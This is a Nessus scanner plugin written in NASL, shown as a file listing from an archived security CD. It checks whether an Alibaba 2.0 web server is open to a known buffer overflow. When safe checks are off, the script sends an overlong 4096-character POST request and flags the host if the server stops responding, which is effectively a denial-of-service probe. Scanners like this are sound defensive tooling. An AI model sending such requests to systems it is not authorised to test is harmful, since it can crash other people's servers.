home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / alibaba_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  113 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10012);
  10.  script_bugtraq_id(1482);
  11.  script_cve_id("CAN-2000-0626");
  12.  script_version ("$Revision: 1.23 $");
  13.  
  14.  name["english"] = "Alibaba 2.0 buffer overflow";
  15.  name["francais"] = "DΘpassement de buffer dans Alibaba 2.0";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It is possible to make the remote web server execute
  19. arbitrary commands by sending the following request:
  20.  
  21.     POST AA[...]AA/ HTTP/1.0
  22.     
  23. This problem may allow an attacker to execute arbitrary code on
  24. the remote system or create a denial of service (DoS) attack.
  25.  
  26. Solution : At the time of this writing, no solution was available. 
  27. Check with your vendor for a possible patch, or consider changing your
  28. web server.
  29.  
  30. Risk factor : High";
  31.  
  32.  desc["francais"] = "Il est possible de faire executer du code arbitraire
  33. α un serveur faisant tourner Alibaba 2.0 en lui envoyant la
  34. commande suivante :
  35.  
  36.     POST AA[...]AAA/ HTTP/1.0
  37.     
  38. Ce problΦme peut permettre α un pirate d'executer du
  39. code arbitraire sur le systΦme distant, ou de mettre
  40. le systΦme hors-service.
  41.  
  42. Solution : Aucune. Utilisez un autre serveur web
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Alibaba buffer overflow";
  48.  summary["francais"] = "DΘpassement de buffer dans Alibaba";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_MIXED_ATTACK); # mixed
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  56.  family["english"] = "Gain root remotely";
  57.  family["francais"] = "Passer root α distance";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencie("find_service.nes", "www_too_long_url.nasl");
  60.  script_exclude_keys("www/too_long_url_crash");
  61.  script_require_ports("Services/www", 80);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. include("http_func.inc");
  70.  
  71. port = get_http_port(default:80);
  72.  
  73.  
  74. if(safe_checks())
  75. {
  76.  banner = get_http_banner(port: port);
  77.  
  78.  if(egrep(pattern:"^Server:.*[aA]libaba.*", string:banner))
  79.  {
  80.   alrt =  "It may be possible to make the remote Alibaba web server execute
  81. arbitrary code by sending the following request :
  82.  
  83.     POST AA[...]AA/ HTTP/1.0
  84.     
  85. This problem may allow an attacker to execute arbitrary code on
  86. the remote system or create a denial of service.
  87.  
  88. *** Nessus reports this vulnerability using only
  89. *** information that was gathered. Use caution
  90. *** when testing without safe checks enabled.
  91.  
  92. Solution : None at this time. Use another web server
  93. Risk factor : High";
  94.  
  95.   security_hole(port:port, data:alrt);
  96.  }
  97.  exit(0);
  98. }
  99. if(get_port_state(port))
  100. {
  101.  if(http_is_dead(port:port))exit(0);
  102.  data = http_post(item:string(crap(4096),"/"), port:port); 
  103.  soc = http_open_socket(port);
  104.  if(soc > 0)
  105.  {
  106.   send(socket:soc, data:data);
  107.   http_close_socket(soc);
  108.   soc2 = http_open_socket(port);
  109.   if(!soc2)security_hole(port);
  110.   else http_close_socket(soc2);
  111.  }
  112. }
  113.